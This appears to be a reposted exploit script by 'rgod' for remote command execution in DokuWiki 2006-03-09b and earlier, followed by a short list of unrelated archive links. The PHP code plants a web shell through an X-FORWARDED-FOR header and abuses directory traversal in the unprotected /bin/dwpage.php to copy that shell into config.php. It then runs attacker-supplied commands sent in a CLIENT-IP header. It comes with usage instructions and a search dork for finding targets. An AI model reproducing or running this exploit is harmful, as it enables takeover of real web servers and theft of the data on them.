DokuWiki <= 2006-03-09brel /bin/dwpage.php remote commands execution



#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
--------------------------------------------------------------------------------
DokuWiki <= 2006-03-09b release /bin/dwpage.php remote commands execution xploit
by rgod rgod@xxxxxxxxxxxxx
site: http://retrogod.altervista.org
dork: "Driven by DokuWiki"
--------------------------------------------------------------------------------
');
/*
works with register_argc_argv = On
*/
if ($argc<4) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: path to dokuwiki
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /wiki/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost /wiki/ ls -la -p81
--------------------------------------------------------------------------------
');
die;
}
/* software site: http://wiki.splitbrain.org/wiki:dokuwiki

there are some shell scripts in /bin folder and there is no .htaccess to
protect it: most dangerous one is dwpage.php, if register_argc_argv = On
it allows to copy/move files among folders because of $TARGET_FN var
directory traversal, also you can inject a shell by main doku.php script
sending a malicious X-FORWARDED-FOR http header (but you could do the same
uploading some file in /data/media folder through /lib/exe/media.php...,
I choosed the first solution)

also, I noticed, you can disclose php configuration by
setting an http header like this calling the main doku.php
script:

X-DOKUWIKI-DO: debug

(debug feature is enabled by default...)
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

//create /data/pages/suntzu.txt.lock and inject the shell code
$data="do=edit&rev=&id=suntzu";
$packet="POST ".$p."doku.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="X-FORWARDED-FOR: <?php set_time_limit(0);echo 'my_delim';passthru(\$_SERVER['HTTP_CLIENT_IP']);die;?>\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);

//copy /data/pages/suntzu.txt.lock to /data/pages/wiki/suntzu.txt
$packet="GET ".$p."bin/dwpage.php?-m+\"suntzu\"+commit+../data/pages/suntzu.txt.lock+wiki:suntzu HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);

//copy /data/pages/wiki/suntzu.txt to config.php inside main folder
$packet="GET ".$p."bin/dwpage.php?-m+\"suntzu\"+checkout+wiki:suntzu+../config.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);

//launch commands...
$packet="GET ".$p."config.php HTTP/1.0\r\n";
$packet.="CLIENT-IP: $cmd\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"my_delim")){echo "exploit succeeded...\r\n";$temp=explode("my_delim",$html);die($temp[1]);}
else { echo "exploit failed...\r\n";}
?>

original url: http://retrogod.altervista.org/dokuwiki_2006-03-09b_cmd.html



Relevant Pages

  • Re: working with mysql
    ... throw new Exception('Error connecting to host. ... I would like to be able to get php to pull the data. ... Did you take out your throw statement and put in the echo like I asked? ...
    (comp.lang.php)
  • Re: working with mysql
    ... throw new Exception('Error connecting to host. ... I would like to be able to get php to pull the data. ... Did you take out your throw statement and put in the echo like I asked? ...
    (comp.lang.php)
  • Re: [PHP] Re: header
    ... public $scheme = false; ... public $host = false; ... echo $url->scheme; ... it would be nice if PHP had gave access to all the properties in a simple UNIFIED way regardless of the http server software and protocol used. ...
    (php.general)
  • Cant read remote Web page from local Apache/PHP
    ... echo file_get_contents; ... works fine if I upload the PHP script to my Web host, ... established connection failed because connected host has failed to ...
    (comp.lang.php)
  • NOCC Webmail <= 1.0 multiple vulnerabilities
    ... "NOCC is a webmail client written in PHP. ... remote code execution, there are two ways of execute arbitrary code on ... is defined in conf.php, by default no path is defined, but script suggests ... echo nl2br); ...
    (Bugtraq)